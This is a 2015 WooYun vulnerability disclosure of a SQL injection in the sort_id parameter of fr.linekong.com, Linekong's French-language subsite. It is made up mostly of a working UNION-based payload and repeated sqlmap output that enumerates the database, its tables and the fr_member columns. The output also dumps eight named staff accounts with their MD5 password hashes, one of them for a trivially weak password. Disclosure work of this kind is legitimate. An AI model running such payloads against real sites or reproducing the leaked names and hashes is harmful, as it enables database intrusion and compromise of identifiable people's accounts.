当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118746

漏洞标题:蓝港又一分站SQL注入

相关厂商:linekong.com

漏洞作者: 路人甲

提交时间:2015-06-08 12:36

修复时间:2015-07-24 14:46

公开时间:2015-07-24 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

求高RANK

详细说明:

注入点:

http://fr.linekong.com/xml/common.php?sort_id=*


sort_id参数存在sql注入

1.jpg


sqlmap identified the following injection points with a total of 2179 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
    Vector:  UNION ALL SELECT 92,[QUERY],92,92#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] fr_web
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
[28 tables]
+-------------------------+
| fr_activity_newcard_log |
| fr_address              |
| fr_article              |
| fr_article_inserl       |
| fr_build                |
| fr_channel              |
| fr_columns              |
| fr_comment              |
| fr_download             |
| fr_editors_inserl       |
| fr_flash                |
| fr_grading              |
| fr_group                |
| fr_image                |
| fr_image_inserl         |
| fr_member               |
| fr_passportstat         |
| fr_sort                 |
| fr_template             |
| fr_url                  |
| fr_url_inserl           |
| fr_vote                 |
| fr_vote_inserl          |
| fr_vote_option          |
| fr_wj_article           |
| fr_wj_article_inserl    |
| fr_wj_image             |
| fr_wj_image_inserl      |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[8 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| 王磊        | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | cbef2ead7978557272b0c692f356b3cd |
| 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| 张静        | b1d8fcdf6d0db7011c71fc30e7aef4a4 |
| 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
+-----------+----------------------------------+

漏洞证明:

sqlmap identified the following injection points with a total of 2179 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
    Vector:  UNION ALL SELECT 92,[QUERY],92,92#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] fr_web
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
[28 tables]
+-------------------------+
| fr_activity_newcard_log |
| fr_address              |
| fr_article              |
| fr_article_inserl       |
| fr_build                |
| fr_channel              |
| fr_columns              |
| fr_comment              |
| fr_download             |
| fr_editors_inserl       |
| fr_flash                |
| fr_grading              |
| fr_group                |
| fr_image                |
| fr_image_inserl         |
| fr_member               |
| fr_passportstat         |
| fr_sort                 |
| fr_template             |
| fr_url                  |
| fr_url_inserl           |
| fr_vote                 |
| fr_vote_inserl          |
| fr_vote_option          |
| fr_wj_article           |
| fr_wj_article_inserl    |
| fr_wj_image             |
| fr_wj_image_inserl      |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[8 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| 王磊        | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | cbef2ead7978557272b0c692f356b3cd |
| 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| 张静        | b1d8fcdf6d0db7011c71fc30e7aef4a4 |
| 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
+-----------+----------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-09 14:45

厂商回复:

感谢提出的问题,该项目已下线,我们准备进行下线操作

最新状态:

暂无